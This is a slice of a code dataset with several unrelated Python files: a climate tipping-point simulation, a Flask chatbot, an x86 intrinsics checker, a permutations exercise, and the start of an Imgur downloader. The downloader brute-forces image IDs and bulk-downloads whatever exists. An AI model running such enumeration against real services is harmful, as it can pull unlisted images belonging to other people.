activeShare = float(root_x[0])\n firstRoot.append(activeShare)\n numTipped.append(tippedElements / 4)\n\n lastTemp = float(gmt[-1])\n # stop the temperature from increasing forever\n if(activeShare > (a+c-0.05)):\n activeShare = 1 # in the future can make >1\n #newTemp = float(lastTemp - 0.0005)\n #else:\n newTemp = float(lastTemp + (1 - activeShare) * tr) # vary this 0.01 from 0.005 to 0.05\n #print(newTemp,\" \",type(newTemp))\n gmt.append(newTemp)\n\n if(len(root_x)==1):\n granTipped = True\n # unclear but sometimes list sometimes scalar\n if(isinstance(root_x, list)):\n root_x = root_x[0]\n #roots[t-2][0] = float(root_x) # used to be root_x[0]\n if(first):\n times.append(t-2)\n first = False\n #else:\n #roots[t-2] = root_x\n\n #saving structure\n output.append([t,\n ev.get_timeseries()[1][-1, 0],\n ev.get_timeseries()[1][-1, 1],\n ev.get_timeseries()[1][-1, 2],\n ev.get_timeseries()[1][-1, 3],\n net.get_number_tipped(ev.get_timeseries()[1][-1]),\n [net.get_tip_states(ev.get_timeseries()[1][-1])[0]].count(True), \n [net.get_tip_states(ev.get_timeseries()[1][-1])[1]].count(True),\n [net.get_tip_states(ev.get_timeseries()[1][-1])[2]].count(True),\n [net.get_tip_states(ev.get_timeseries()[1][-1])[3]].count(True),\n root_x, effective_GMT\n ])\n\n \n #necessary for break condition\n if len(output) != 0:\n #saving structure\n data = np.array(output, dtype=object)\n\n saveGMT = data[-1]\n if(isinstance(saveGMT[-2],np.ndarray)):\n saveGMT[-2] = saveGMT[-2][0]\n\n np.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.txt\".format(long_save_name, namefile, a, c, \n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree), saveGMT)\n time = data.T[0]\n state_gis = data.T[1]\n state_thc = data.T[2]\n state_wais = data.T[3]\n state_amaz = data.T[4]\n root_series = data.T[-2] #roots ????\n gmt_series = data.T[-1] #gmt series\n\n np.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}_gmt.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree), gmt_series)\n \n # np.savetxt(\"{}/{}_feedbacks/{}_{}/network_{}_{}_{}/feedbacks_care{}_{}_{:.2f}_{:.2f}_ALLROOTS.txt\".format(long_save_name, namefile, a, c,\n # kk[0], kk[1], kk[2], a, c, strength, ets), roots)\n\n #plotting structure\n fig = plt.figure()\n plt.grid(True)\n plt.title(\"Degree: {} A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wais to Thc:{} Amaz to Nino:{} Thc to Amaz:{}\".format(\n avg_degree, a, c, ets, kk[0], kk[1], kk[2]))\n plt.plot(time, state_gis, label=\"GIS\", color='c')\n plt.plot(time, state_thc, label=\"THC\", color='b')\n plt.plot(time, state_wais, label=\"WAIS\", color='k')\n plt.plot(time, state_amaz, label=\"AMAZ\", color='g')\n plt.xlabel(\"Time [yr]\")\n plt.ylabel(\"system feature f [a.u.]\")\n plt.legend(loc='best') # , ncol=5)\n fig.tight_layout()\n plt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree))\n #plt.show()\n plt.clf()\n plt.close()\n\n\n fig = plt.figure()\n plt.grid(True)\n plt.title(\"Degree: {} A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wais to Thc:{} Amaz to Nino:{} Thc to Amaz:{}\".format(\n avg_degree, a, c, ets, kk[0], kk[1], kk[2]))\n plt.plot(time, gmt_series, label=\"GMT\", color='r')\n plt.xlabel(\"Time [yr]\")\n plt.ylabel(\"$\\Delta$ GMT [°C]\")\n plt.legend(loc='best') # , ncol=5)\n fig.tight_layout()\n plt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/gmtseries_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree))\n #plt.show()\n plt.clf()\n plt.close()\n\n \n # **********************************\n fig, ax1 = plt.subplots()\n plt.grid(True)\n plt.title(\"Degree: {} A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wa to Thc:{} Am to Ni:{} Thc to Am:{}\".format(\n avg_degree, a, c, ets, kk[0], kk[1], kk[2]))\n ax1.set_xlabel(\"Time [yr]\")\n ax1.set_ylabel(\"Percentage\")\n plot1 = ax1.plot(time, firstRoot, label = \"active people\", color='r')\n plot2 = ax1.plot(time, numTipped, label = \"tipped elements\", color='g')\n\n ax2 = ax1.twinx()\n ax2.set_ylabel(\"GMT\", color = 'b')\n plot3 = ax2.plot(time, gmt_series, label=\"GMT\", color='b')\n #plt.legend(loc='best')\n lns = plot1 + plot2 + plot3\n labels = [l.get_label() for l in lns]\n plt.legend(lns, labels, loc=0)\n ax1.set_ylim(top = 1.25)\n ax2.set_ylim(top = 5)\n fig.tight_layout()\n plt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/root_care{:.2f}_{:.2f}_{:.2f}_{:.2f}_{}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength, ets, avg_degree))\n #plt.show()\n plt.clf()\n plt.close()\n \n \n #print(\"times: \", times)\n\n finalTemp.append(gmt_series[-1])\n finalTipped.append(numTipped[-1])\n finalActive.append(firstRoot[-1])\n\n#it is necessary to limit the amount of saved files\n#--> compose one pdf file for each network setting and remove the other time-files\ncurrent_dir = os.getcwd()\nos.chdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\npdfs = np.array(np.sort(glob.glob(\"feedbacks_care{:.2f}_{:.2f}_*.pdf\".format(a, c)), axis=0))\nif len(pdfs) != 0.:\n merger = PdfFileMerger()\n for pdf in pdfs:\n merger.append(pdf)\n os.system(\"rm feedbacks_care{:.2f}_{:.2f}_*.pdf\".format(a, c))\n merger.write(\"feedbacks_complete_care{:.2f}_{:.2f}.pdf\".format(a, c))\n print(\"Complete PDFs merged - Part 1\")\n\npdfs = np.array(np.sort(glob.glob(\"gmtseries_care{:.2f}_{:.2f}_*.pdf\".format(a, c)), axis=0))\nif len(pdfs) != 0.:\n merger = PdfFileMerger()\n for pdf in pdfs:\n merger.append(pdf)\n os.system(\"rm gmtseries_care{:.2f}_{:.2f}_*.pdf\".format(a,c))\n merger.write(\"gmtseries_complete_care{:.2f}_{:.2f}.pdf\".format(a, c))\n print(\"Complete PDFs merged - Part 2\")\n\npdfs = np.array(np.sort(glob.glob(\"root_care{:.2f}_{:.2f}_*.pdf\".format(a, c)), axis=0))\nif len(pdfs) != 0.:\n merger = PdfFileMerger()\n for pdf in pdfs:\n merger.append(pdf)\n os.system(\"rm root_care{:.2f}_{:.2f}_*.pdf\".format(a, c))\n merger.write(\"root_complete_care{:.2f}_{:.2f}.pdf\".format(a, c))\n print(\"Complete PDFs merged - Part 3\")\n\nos.chdir(current_dir)\n\n\nnp.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_finalTemps.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength), finalTemp) \nnp.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_finalTipped.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength), finalTipped) \nnp.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_finalActive.txt\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength), finalActive) \n\n\nfig, ax1 = plt.subplots()\nplt.grid(True)\nplt.title(\"A: {:.2f} C: {:.2f} ETS: {:.2f}\\n Wa to Thc:{} Am to Ni:{} Thc to Am:{}\".format(\n a, c, ets, kk[0], kk[1], kk[2]))\nax1.set_xlabel(\"Average Degree\")\nax1.set_ylabel(\"Percentage\")\nplot1 = ax1.plot(degrees, finalActive, label = \"active people\", color='r')\nplot2 = ax1.plot(degrees, finalTipped, label = \"tipped elements\", color='g')\n\nax2 = ax1.twinx()\nax2.set_ylabel(\"GMT\", color = 'b')\nplot3 = ax2.plot(degrees, finalTemp, label=\"GMT\", color='b')\n#plt.legend(loc='best')\nlns = plot1 + plot2 + plot3\nlabels = [l.get_label() for l in lns]\nplt.legend(lns, labels, loc=0)\n#ax1.set_ylim(top = 1.25)\n#ax2.set_ylim(top = 5)\nfig.tight_layout()\nplt.savefig(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/ALL_{:.2f}_{:.2f}_{:.2f}.pdf\".format(long_save_name, namefile, a, c,\n kk[0], kk[1], kk[2], a, c, strength))\n#plt.show()\nplt.clf()\nplt.close() \n\nprint(\"Finish\")\n#end = time.time()\n#print(\"Time elapsed until Finish: {}s\".format(end - start))","repo_name":"jasminezh1/granovetter_pycascades","sub_path":"MAIN_coupled.py","file_name":"MAIN_coupled.py","file_ext":"py","file_size_in_byte":19435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71762390873","text":"import flask\nfrom flask import Flask, render_template, request, jsonify\nimport requests\nimport json\nfrom modules.chatbot import text_chatbot, semantic_search, get_response\nfrom modules.speech import speech_recognition\nfrom modules.facebook import send_facebook_messenger_message, send_instagram_message\nfrom flask_compress import Compress\n\napp = Flask(__name__)\nCompress(app)\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/get_response\", methods=[\"POST\"])\ndef get_bot_response():\n user_input = request.form[\"user_input\"]\n response = get_response(user_input)\n user_id = request.args.get(\"user_id\")\n send_facebook_messenger_message(user_id, response)\n send_instagram_message(user_id, response)\n\n return jsonify({\"response\": response})\n\n@app.route(\"/process_audio\", methods=[\"POST\"])\ndef process_audio():\n try:\n audio = request.files['audio']\n audio.save(\"user_audio.wav\")\n with sr.AudioFile(\"user_audio.wav\") as source:\n audio_data = recognizer.record(source)\n try:\n transcribed_text = recognizer.recognize_google(audio_data)\n return transcribed_text\n except sr.UnknownValueError:\n return \"Sorry, I couldn't understand the recording.\"\n except Exception as e:\n print(\"Error processing audio:\", e)\n return \"An error occurred while processing the audio.\"\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\",port=5000)\n","repo_name":"Siddesh272/ChatAll","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15156262830","text":"# -*- coding:UTF-8 -*-\nimport json\n\n\ndef i_filter(s):\n return ''.join(c for c in s if c.isalnum())\n\n\ndef match_string(target, input_string):\n input_words = input_string.lower().split()\n for word in input_words:\n if word == target:\n return True\n return False\n\n\nif __name__ == '__main__':\n with open('intrinsics.db.output.json', 'r') as f:\n intrinsics = json.load(f)\n with open('instructions.db.output.json', 'r') as f:\n instructions = json.load(f)\n notFound = []\n for intrinsic in intrinsics:\n if 'instruction' in intrinsic and i_filter(intrinsic['instruction']) != '':\n instruction = i_filter(intrinsic['instruction'])\n else:\n continue\n found = False\n for section in instructions:\n instructionsInSection = section['instructions']\n for i in instructionsInSection:\n if i['mnemonic'].lower() == instruction:\n found = True\n break\n table = i['data']['table']\n for t in table:\n if t['type'] == 'table':\n items = t['value']['items']\n for item in items:\n if 'instruction' in item and match_string(instruction, item['instruction']):\n found = True\n if 'opcodeinstruction' in item and match_string(instruction, item['opcodeinstruction']):\n found = True\n if found:\n break\n if found:\n break\n if not found:\n if instruction not in notFound:\n notFound.append(instruction)\n print(str(len(notFound)) + ' instructions not found')\n with open('notFound.output.json', 'w') as f:\n json.dump(notFound, f, indent=2)\n","repo_name":"Akiko97/x86InstructionRefDB","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15665186622","text":"from itertools import permutations\n\nn, m = map(int, input().split())\n\narray = [i for i in range(1, n + 1)]\narray = list(permutations(array, m))\n\nfor i in array :\n for j in range(m) :\n print(i[j], end = ' ')\n print()","repo_name":"nyongja/BOJ","sub_path":"back_tracking/15649_N과M(1).py","file_name":"15649_N과M(1).py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2331160497","text":"# import sys\n\nimport datetime\nimport imghdr\nimport itertools\nimport os\nimport queue\nimport threading\nimport time\nimport uuid\nimport requests\n# import sqlite3 as sql\n# import ftplib\n\n\nfrom setup import setup_variables, create_database\nfrom dep.db_handler import DB_handler\n\n# Setup variables and SQLDB\nsettings = setup_variables()\nDB_finnished = create_database(settings)\n\nwhile True:\n if DB_finnished is True:\n break\n\n\nDB_Handler = DB_handler\n\n\n# Numbers used by update_terminal\nredirectFileLength = 0\nCheckedURLFileLength = 0\nErrorFileLength = 0\n\n\nwork_queue = queue.Queue(maxsize=settings[\"max_queue_size\"])\ndb_queue = queue.Queue(maxsize=settings[\"max_queue_size\"])\n\n# string_set = set() # create an empty set to store the strings\nthreads_amount = 0\ntotal_downloaded = 0\ntotal_tested = 0\narchive_files_amount = 0\ntotal_iterations = 0\narchive_files_size = \"\"\nlatest_string = \"\"\nlatest_string_from_File = \"\"\nErrorLogs = []\nStartedWork = False\n\ncurrent_workers = {}\n\n\ndef compare_files():\n archive_files = []\n checked_files = []\n\n # Get list of files in Archive folder\n for root, dirs, files in os.walk(settings[\"download_folder\"]):\n for file in files:\n archive_files.append(file)\n\n # Get list of files in checkedURLs.txt\n with open(settings[\"checked_url_filename\"], \"r\") as f:\n for line in f:\n checked_files.append(line.strip())\n\n # Find files that exist in checkedURLs.txt but not in Archive folder\n diff_files = set(checked_files) - set(archive_files)\n\n return diff_files\n\n\ndef sizeof_fmt(num, suffix=\"B\"):\n for unit in [\"\", \"Ki\", \"Mi\", \"Gi\", \"Ti\", \"Pi\", \"Ei\", \"Zi\"]:\n if abs(num) < 1024.0:\n return f\"{num:.1f} {unit}{suffix}\"\n num /= 1024.0\n return f\"{num:.1f} Yi{suffix}\"\n\n\ndef update_terminal():\n global current_workers\n global total_downloaded\n global total_tested\n global total_iterations\n global threads_amount\n global ErrorLogs\n global archive_files_amount\n global archive_files_size\n global redirectFileLength\n global CheckedURLFileLength\n global ErrorFileLength\n global latest_string\n global StartedWork\n global work_queue\n pppIterations = 0\n\n # estimated_latest_string = get_last_file_name(settings[\"download_folder\"])\n\n # estimated_latest_string = DB_Handler.fetch_last_combination()\n\n while True:\n try:\n # Create the header\n header = \"\\n\\n\\n\\n\\nIMGUR DOWNLOADER\\n\"\n header += f\"Last refresh: {datetime.datetime.now().strftime('%H:%M:%S')}\\n\"\n\n worker_rows = []\n workerBlock = \"\"\n\n # if StartedWork:\n if not settings[\"worker_print_disable\"]:\n\n if settings[\"worker_print_mini\"]:\n worker_rows.append(f\"Workers: {f'{len(current_workers)}'}\\n\")\n for worker in current_workers.values():\n workerBlock = (f\"{worker['WorkerID'][:8].upper()}: {worker['Current_Work']}, {worker['current_message']}\")\n \n if 'StringX' in worker:\n workerBlock += f\" -> {worker['StringX']}\"\n workerBlock += \"\\n\"\n \n worker_rows.append(workerBlock)\n\n elif settings[\"worker_print_summary\"]:\n jobs_summary = {}\n for worker in current_workers.values():\n if worker[\"Current_Work\"] in jobs_summary:\n jobs_summary[worker[\"Current_Work\"]] += 1\n else:\n jobs_summary[worker[\"Current_Work\"]] = 1\n for job in jobs_summary:\n worker_rows.append(f\"{job}: {jobs_summary[job]}\\n\")\n \n elif settings[\"worker_print_hide_check_links_workers\"]:\n workers_in_hiding = 0\n\n # Print how many workers exists\n worker_rows.append(f\"Total workers: {f'{len(current_workers)}'}\\n\")\n for worker in current_workers.values():\n #Filter out Check_links workers\n if worker[\"Current_Work\"] == \"check_links\":\n workers_in_hiding +=1\n continue\n\n workerStats = \"\"\n \n # Collect and append key values, filter out items in keys_to_ignore\n keys_to_ignore = (\"WorkerID\")\n for item in worker.keys():\n if item in keys_to_ignore:\n continue\n workerStats = workerStats + \\\n f\" {item}: {worker[item]}\\n\"\n\n # Initiate the section for this current worker\n workerBlock = (\n f\"Worker: {worker['WorkerID'][:8].upper()}\\n\" +\n workerStats + \"\\n\"\n )\n worker_rows.append(workerBlock)\n if workers_in_hiding >= 1:\n worker_rows.append(f\"\\nHiding {workers_in_hiding} workers.\")\n else:\n for worker in current_workers.values():\n workerStats = \"\"\n worker_rows.append(\n f\"Workers: {f'{len(current_workers)}'}\\n\")\n keys_to_ignore = (\"WorkerID\")\n\n for item in worker.keys():\n if item in keys_to_ignore:\n continue\n workerStats = workerStats + \\\n f\" {item}: {worker[item]}\\n\"\n\n workerBlock = (\n f\"Worker: {worker['WorkerID'][:8].upper()}\\n\" +\n workerStats + \"\\n\"\n )\n worker_rows.append(workerBlock)\n\n # Add the totals row and footer\n totals = f'Current session downloads: {total_downloaded}\\n'\n totals += f'Current session URLs tested: {total_tested}\\n'\n totals += f'Number of threads: {len(current_workers)}\\n'\n totals += f'Queue length (work_queue): {work_queue.qsize()}\\n'\n totals += f'Queue length (db_queue): {db_queue.qsize()}\\n'\n totals += f'Queue max length: {work_queue.maxsize}\\n'\n totals += f'Download Folder: {settings[\"download_folder\"]}\\n'\n totals += f'Total iterations: {total_iterations}\\n'\n totals += f'Latest Iteration: {db_updater.fetch_last_combination()}\\n'\n totals += f'Iterations since last refresh: {total_iterations-pppIterations}\\n'\n # totals += f'Estimated latest string: {estimated_latest_string}\\n'\n totals += f'Lines in Error registry: {ErrorFileLength}'\n\n # totals += '\\n'\n # totals += f'Total number of files in archive folder: {str(archive_files_amount)}\\n' # See \"Stats.py\" for this info\n # totals += f'Total size of archive folder (in bytes): {archive_files_size}\\n'\n\n # Print the full status message\n # footer = []\n # for error in ErrorLogs:\n # footer.append(str(error) + \"\\n\")\n\n print(f\"{header}{totals}\\n{''.join(worker_rows)}\")\n\n # if len(footer) >= 1:\n # print(\"Last 3 Error messages:\\n\")\n # for error in footer[-3:]:\n # print(str(error) + \"\\n\")\n\n # write_last_info()\n pppIterations = total_iterations\n\n if StartedWork:\n time.sleep(0.5)\n else:\n time.sleep(5)\n\n except Exception as e:\n # print(e)\n write_error_string(error=e)\n raise Exception(e)\n # exit()\n\n\ndef get_last_file_name(directory):\n # Get a list of all files in the directory\n file_list = os.listdir(directory, )\n\n # Sort the files by name\n sorted_files = sorted(file_list)\n\n # Get the last file in the list\n last_folder_name = sorted_files[-1]\n\n file_list = os.listdir(f\"{directory}/{last_folder_name}\")\n\n # Sort the files by name\n sorted_files = sorted(file_list)\n\n # Get the last file in the list\n last_file_name = sorted_files[-1]\n return last_file_name.split(\".\")[0]\n\n\ndef fetch_checked_file(StringX):\n file_prefix = StringX[\n :-2\n ] # Use the first N-2 characters of the string as the prefix for the file name\n # Construct the file path using the prefix\n file_path = f'{settings[\"db_folder\"]}/{file_prefix}.txt'\n return file_path\n\n\n# def is_string_used_IO(StringX):\n# sub_folder = StringX[\n# :-2\n# ] # Use the first N-2 characters of the string as the prefix for the file name\n# file_path = (\n# # Construct the file path using the prefix\n# f'{settings[\"download_folder\"]}/{sub_folder}'\n# )\n\n# # temp = os.path.abspath(file_path)\n# # temp2 = os.listdir(os.path.abspath(file_path))\n# try:\n# # for filename in temp2:\n# for filename in os.listdir(os.path.abspath(file_path)):\n# if StringX in filename.split(\".\")[0]:\n# return True\n\n# return False\n# except FileNotFoundError:\n# return False\n\n\ndef is_string_used(string=\"\", firstRun=False):\n # TODO Convert this to use db_updater, if that works better.\n temp = DB_Handler.search_for_string(string)\n return temp\n\n\n# def write_string(string):\n\n# with open(fetch_checked_file(string), \"a+\") as f:\n# f.write(string + \"\\n\")\n# # with open(Checked_Strings_File, 'a') as f:\n# # f.write(string + '\\n')\n\n\ndef write_error_string(error=\"\", message=\"\", StringX=\"\"):\n if not os.path.isfile(settings[\"error_filename\"]):\n with open(settings[\"error_filename\"], \"w+\") as f:\n f.write(\"\")\n \n with open(settings[\"error_filename\"], \"a+\") as f:\n now = datetime.datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n\n f.write(f\"{current_time}: {message}. Error: {str(error)}\\n\")\n # if not StringX == \"\":\n # write_string(StringX)\n\n\n# def write_redirect_url(string):\n# with open(settings[\"redirect_urls_filename\"], \"a+\") as f:\n# f.write(string + \"\\n\")\n# write_string(string)\n\n\n# def write_retry_strings(string):\n# with open(settings[\"retry_filename\"], \"a+\") as f:\n# if string.endsWith(\"\\n\"):\n# f.write(string)\n# f.write(string + \"\\n\")\n# write_string(string)\n\n\n# def transfer_to_ftp():\n# session = ftplib.FTP('server.address.com','USERNAME','PASSWORD')\n# file = open('kitten.jpg','rb') # file to send\n# session.storbinary('STOR kitten.jpg', file) # send the file\n# file.close() # close file and FTP\n# session.quit()\n\n\ndef download_image(string, response, current_worker_info):\n global total_downloaded\n\n \n file_name = \"\"\n update_worker_status(\"Getting file extension\", current_worker_info)\n file_extension = get_file_extension(response)\n file_name = string + file_extension\n update_worker_status(\n f\"Got file extension and filename {file_name}\", current_worker_info\n )\n \n \n # Create folder to download inside.\n update_worker_status(\"Configurating Filepath\", current_worker_info)\n dir_name = os.path.join(settings[\"download_folder\"], file_name[:4])\n if not os.path.exists(dir_name):\n os.makedirs(dir_name, exist_ok=True)\n\n file_path = os.path.join(dir_name, file_name)\n\n update_worker_status(\"Writing image to file\", current_worker_info)\n try:\n with open(file_path, \"wb\") as f:\n f.write(response.content)\n # print(f\"Downloaded image {file_name}\")\n # write_string(string)\n except Exception as e:\n update_worker_status(f\"Error writing file: {e}\", current_worker_info)\n raise Exception\n # Collect some data about the image \n file_size = get_file_size(file_path)\n status_code = response.status_code\n \n\n\n db_queue.put({\"work_type\": \"submit_new_stringX\",\n \"StringX\": string,\n \"response_code\": int(status_code),\n \"was_image\": True,\n \"file_path\": file_path,\n \"file_size\": file_size,\n \"message\": \"Download_image\"\n })\n\n total_downloaded += 1\n\n\ndef get_file_extension(response):\n image_type = imghdr.what(None, h=response.content)\n if image_type:\n extension = \".\" + image_type\n else:\n extension = \".jpg\"\n return extension\n\n\n# def update_worker_status(message, workerID):\ndef update_worker_status(message, current_worker_info):\n global current_workers\n\n current_workers[current_worker_info[\"WorkerID\"]\n ][\"current_message\"] = message\n\ndef retrive_response(current_worker_info, StringX, recive_head = False, retries = 0, response=None):\n global total_tested\n if retries > 3:\n \n # try:\n update_worker_status(\n \"String failed. Writing down string and closing down.\",\n current_worker_info,\n )\n db_queue.put({\n \"work_type\": \"submit_new_stringX\",\n \"message\": \"Error after trying 3 times.\",\n \"response_code\": int(response.status_code),\n \"StringX\": StringX,\n })\n # write_string(StringX)\n return \n \n try:\n response_status = 0\n update_worker_status(\n f\"Connecting to URL, retries: {retries}\", current_worker_info\n )\n\n url = settings[\"url_base\"] + StringX + \".jpg\"\n \n if recive_head is True:\n response = requests.head(url, allow_redirects=False, timeout=15)\n else:\n response = requests.get(url, allow_redirects=False, timeout=15)\n \n response_status = int(response.status_code)\n update_worker_status(\n f\"Finished connecting to URL, retries: {retries}\", current_worker_info\n )\n\n except requests.exceptions.SSLError:\n update_worker_status(\n f\"Got SSLError. String: {StringX}, . Retries left: {retries}\",\n current_worker_info,\n )\n # We have been blocked by the host. Wait for a little bit and try again.\n time.sleep(5)\n retries += 1\n check_links(\n current_worker_info=current_worker_info, retries=retries, response=response\n )\n\n except ConnectionError as e:\n update_worker_status(\n \"Got timeout. Adding to Retry list for later.\", current_worker_info\n )\n db_queue.put({\n \"work_type\": \"submit_new_stringX\",\n \"message\": f\"Got Timeout Error. Error: {e}\",\n \"StringX\": StringX,\n \"response_code\": int(response_status)\n })\n # write_retry_strings(StringX)\n # DB_handler.submit_new_stringX(StringX=StringX, response_code=response_status, was_image=False)\n pass\n # except Exception as e:\n # update_worker_status(\n # \"Got Error. Writing down error, and continue.\", current_worker_info\n # )\n # write_error_string(\n # message=f\"Error with String {StringX}. Could not get response. Error: \\n{e}\",\n # StringX=StringX,\n # )\n # write_retry_strings(StringX)\n # pass\n\n if response_status == 200: \n update_worker_status( \"Got Status code 200. Downloading image. \", current_worker_info)\n \n \n\n elif response_status == 302:\n update_worker_status(\"Got Status code 302. Skip this URL \", current_worker_info)\n db_queue.put({\n \"work_type\": \"submit_new_stringX\",\n \"StringX\": StringX,\n \"was_image\": False,\n \"response_code\": int(response_status),\n \"message\": \"Status 302\"\n })\n total_tested += 1\n return\n\n elif response_status == 429:\n retries += 1\n temp = response\n # If error is 429 (blocked by host) wait 2 minutes before trying again, then reset the retries counter.\n if response.status_code == 429:\n timeleft = 90\n while True:\n if timeleft <= 0:\n break\n update_worker_status(f\"Got Status code {response_status}, blocked by host. Time until retry: {timeleft}\",current_worker_info,)\n time.sleep(1)\n timeleft -=1\n \n retries = 0\n # We have been blocked by the host. Wait for a little bit and try again.\n update_worker_status(f\"Got Status code {response_status}, blocked by host. Retries left: {retries}\",current_worker_info,)\n # time.sleep(5)\n check_links(\n current_worker_info=current_worker_info, retries=retries, response=response\n )\n\n elif response_status == 104:\n retries += 1\n update_worker_status(\n f\"Got Status code {response_status}, Connection Reset From Host. Retries left: {retries}\",\n current_worker_info,\n )\n # We have been blocked by the host. Wait for a little bit and try again.\n time.sleep(5)\n check_links(\n current_worker_info=current_worker_info, retries=retries, response=response\n )\n\n elif response_status == 500:\n retries += 1\n update_worker_status(\n f\"Got Status code {response_status}, Connection Reset From Host. Retries left: {retries}\",\n current_worker_info,\n )\n # We have been blocked by the host. Wait for a little bit and try again.\n time.sleep(5)\n check_links(\n current_worker_info=current_worker_info, retries=retries, response=response\n )\n else: \n retries += 1\n update_worker_status(\n f\"Got unknow status code: {response_status}. Writing down error, put String into file of strings to try later, then continue. Retries left: {retries}\",\n current_worker_info,\n )\n # write_error_string(f\"Error with String {StringX}. Got unknown Status code: {response_status}\")\n # write_retry_strings(StringX)\n\n time.sleep(5)\n check_links(\n current_worker_info=current_worker_info, retries=retries, response=response\n )\n return response\n\n\ndef check_links(current_worker_info, retries=0, response=None):\n global total_tested\n # global current_workers\n global ErrorLogs\n\n global StartedWork\n StartedWork = True\n\n # Set string X from current_worker_info\n StringX = current_worker_info[\"StringX\"]\n\n # Get HEAD and check status_code\n status = retrive_response(current_worker_info=current_worker_info, StringX=StringX, recive_head=True)\n \n if status == None:\n return\n # If 200 send response_content to Download Image\n if status.status_code == 200: \n response = retrive_response(current_worker_info=current_worker_info, StringX=StringX, recive_head=False)\n download_image(string=StringX,current_worker_info=current_worker_info, response=response)\n\ndef check_links_start(current_worker_info):\n while True:\n try:\n current_worker_info[\"current_message\"] = \"Now i wait for a job from the Queue!\"\n StringX = work_queue.get()\n current_worker_info[\"StringX\"] = StringX\n # current_worker_info[\"current_message\"] = f\"Got job with string {StringX}\"\n update_worker_status(\n f\"Got job with string {StringX}\", current_worker_info)\n check_links(current_worker_info)\n except Exception as e:\n write_error_string(e)\n raise Exception(e)\n\n\n\ndef get_file_length(file):\n line_count = 0\n with open(file, \"r\") as f:\n for line in f:\n line_count += 1\n return line_count\n\n\ndef get_file_size(path):\n temp = os.stat(path).st_size\n return temp\n\n\ndef fetch_files_number_and_size():\n while True:\n try:\n # Get total number of files and total size of archive folder\n # global archive_files_amount\n # global archive_files_size\n # global redirectFileLength\n # global CheckedURLFileLength\n global ErrorFileLength\n\n # archive_files_amount = 0\n\n ErrorFileLength = get_file_length(settings[\"error_filename\"])\n\n except Exception as e:\n write_error_string(message=f\"Error updating stats: {e}\")\n raise Exception(e)\n\n\ndef create_strings(current_worker_info):\n global total_iterations\n # global latest_string\n\n iterations_this_run = settings[\"max_iterations_per_run\"]\n try:\n\n update_worker_status(message=\"Fetching latest generation from DB. (This takes some time on very large)\",current_worker_info=current_worker_info)\n while True:\n # latest_gen = db_queue.put(\"fetch_last_combination\")\n latest_gen = db_updater.fetch_last_combination()\n if latest_gen is not None:\n break\n\n update_worker_status(message=f\"Fount latest gen: {latest_gen}. Will now try to catch up to latest_get\",current_worker_info=current_worker_info)\n Caught_up_to_previous_value = False\n update_worker_status_delay = 50\n for combination in itertools.product(settings[\"character_list\"], repeat=settings[\"generated_string_length\"]):\n if Caught_up_to_previous_value is False:\n update_worker_status_delay -=1\n if update_worker_status_delay >= 0:\n update_worker_status(message=f\"Still catching up! I' at: {combination}\",current_worker_info=current_worker_info)\n \n if latest_gen == ():\n Caught_up_to_previous_value = True\n pass\n elif not combination == latest_gen:\n continue\n\n\n\n Caught_up_to_previous_value = True\n StringX = \"\".join(combination)\n\n # latest_string = StringX\n # if not Caught_up_to_previous_value:\n # print(f\"\\rCreating combination {StringX} \")\n # if StringX == latest_string_from_File:\n # print(\"Found Starting point!\")\n # Caught_up_to_previous_value = True\n # if latest_string_from_File == \"\":\n # pass\n # else:\n # continue\n\n update_worker_status(\n message=f\"I have made string {StringX}\",\n current_worker_info=current_worker_info,\n )\n\n # Batches_ran -= 1\n # if Batches_ran <= 0:\n # # write_last_info()\n # Batches_ran = Batches_before_save\n\n total_iterations += 1\n # if is_string_used(StringX):\n # 